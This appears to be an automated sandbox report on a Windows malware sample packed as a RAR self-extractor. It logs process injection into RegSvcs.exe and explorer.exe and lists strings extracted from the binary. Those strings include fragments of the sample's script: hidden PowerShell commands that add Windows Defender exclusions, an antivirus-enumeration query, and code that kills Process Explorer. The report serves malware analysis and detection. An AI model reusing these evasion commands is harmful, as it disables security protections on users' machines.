              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Thread register set: target process: 4084
Source: C:\Windows\SysWOW64\ipconfig.exe | Thread register set: target process: 4084
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Thread register set: target process: 4084
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: A70000
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: D80000
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 15C0000
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 790000
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Section unmapped: C:\Windows\SysWOW64\control.exe base address: 950000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 10D4008
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: E95000
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: D1B008
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: DE4000
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 10EC008
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FFF000
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: ED8008
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FED000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_00591A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_00533312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: for $objantivirusproduct in $colitems
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $usb = $objantivirusproduct.displayname
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: next
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: return $usb
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: endfunc ;==>antivirus
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: func disabler()
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;if antivirus() = "windows defender" then
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;#requireadmin
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;endif
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: endfunc ;==>disabler
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: func antianalysis()
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: if winexists("process explorer") then
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: winclose("process explorer")
Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: processclose("procexp64.exe")
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: unknown exception
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: bad array new length
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: string too long
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: vector too long
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: unknown exceptionbad array new lengthstring too longvector too long*
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: invalid string position
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: rrhhcxxcinvalid string position
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: ::$attribute_list::$bitmap::$data::$ea::$ea_information::$file_name::$index_allocation:$i30:$index_allocation::$index_root::$logged_utility_stream:$efs:$logged_utility_stream:$txf_data:$logged_utility_stream::$object_id::$reparse_point.\sesecurityprivilegeserestoreprivilegesecreatesymboliclinkprivilege\??\unc\\aclstm..__tmp_reference_source_rtmp0
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: select * from win32_operatingsystem
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: *messages***
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: .rartemp.root\cimv2select * from win32_operatingsystemwqlnamewindows 10*?\\?\.rarexesfxrar00?*<>|"?*uncconprnauxnulcom#lpt#*messages****messages***r!
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: cryptprotectmemory
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: cryptunprotectmemory
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:stringsdialogmenudirectionrtl$%s:@%s: ,s$%s@%s$%s:%s$%s:captionsizecrypt32.dllcryptprotectmemorycryptunprotectmemorycryptprotectmemory failedcryptunprotectmemory failed
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: xlistpos
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: setdlldirectoryw
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: setdefaultdlldirectories
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: xlistposkernel32setdlldirectorywsetdefaultdlldirectoriesversion.dlldxgidebug.dllsfc_os.dllsspicli.dllrsaenh.dlluxtheme.dlldwmapi.dllcryptbase.dlllpk.dllusp10.dllclbcatq.dllcomres.dllws2_32.dllws2help.dllpsapi.dllieframe.dllntshrui.dllatl.dllsetupapi.dllapphelp.dlluserenv.dllnetapi32.dllshdocvw.dllcrypt32.dllmsasn1.dllcryptui.dllwintrust.dllshell32.dllsecur32.dllcabinet.dlloleaccrc.dllntmarta.dllprofapi.dllwindowscodecs.dllsrvcli.dllcscapi.dllslc.dllimageres.dlldnsapi.dlliphlpapi.dllwinnsi.dllnetutils.dllmpr.dlldevrtl.dllpropsys.dllmlang.dllsamcli.dllsamlib.dllwkscli.dlldfscli.dllbrowcli.dllrasadhlp.dlldhcpcsvc6.dlldhcpcsvc.dllxmllite.dlllinkinfo.dllcryptsp.dllrpcrtremote.dllaclui.dlldsrole.dllpeerdist.dlluxtheme.dllplease remove %s from %s folder. it is unsecure to run %s until it is done.createthread failed
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: waitformultipleobjects error %d, getlasterror %d
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: thread pool initialization failed.%ls>%s: %s
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: bad allocation
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: rarhtmlclassnameshell.explorerabout:blank<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head><html><style>body{font-family:"arial";font-size:12;}</style></html>
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: </p><br>
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: <style></style>&nbsp;
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_browsetitle
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_cmdextracting
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_skipping
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_unexpeof
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_fileheaderbroken
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_headerbroken
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_mainheaderbroken
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_cmtheaderbroken
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_cmtbroken
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_outofmemoryerror
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_unknownmethod
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_cannotopen
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_cannotcreate
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_cannotmkdir
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_encrcrcfailed
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_extrcrcfailed
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_packeddatacrcfailed
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_writeerror
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_readerror
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_closeerror
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_cannotfindvol
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_badarchive
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_extracting
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_asknextvoltitle
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_archeaderbroken
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_done
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_error
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_errors
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_bytes
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_modifiedon
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_badfolder
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_createerrors
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_restarthint
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_crcerrors
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_allfiles
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_title1
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_title1a
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_title2
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_title3
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_title4
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_title5
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_title6
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_arcbroken
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_extrfilesto
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_extrfilestotemp
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_extractbutton
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_extractprogress
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_maxpathlimit
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_unkencmethod
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_wrongpassword
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_wrongfilepassword
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_copyerror
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_cannotcreatelnks
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_cannotcreatelnkh
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_errlnktarget
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_needadmin
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_pause
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_continue
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_secwarning
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_secdeldll
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_extrdictoutmem
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_suggest64bit
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_warning
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_dictexceedsram
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_dictsuggestcancel
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: s:ids_extractioncancelled
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $startdlg:size
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $startdlg:caption
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $startdlg:idc_destedittitle
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $startdlg:idc_changedir
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $startdlg:idc_progressbartitle
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $startdlg:idok
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $startdlg:idcancel
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $replacefiledlg:size
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $replacefiledlg:caption
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $replacefiledlg:idc_owrfileexists
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $replacefiledlg:idc_owraskreplace
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $replacefiledlg:idc_owrquestion
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $replacefiledlg:idc_owryes
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $replacefiledlg:idc_owrall
Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $replacefiledlg:idc_owrrename
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrnomemstr_63c53c8e-8
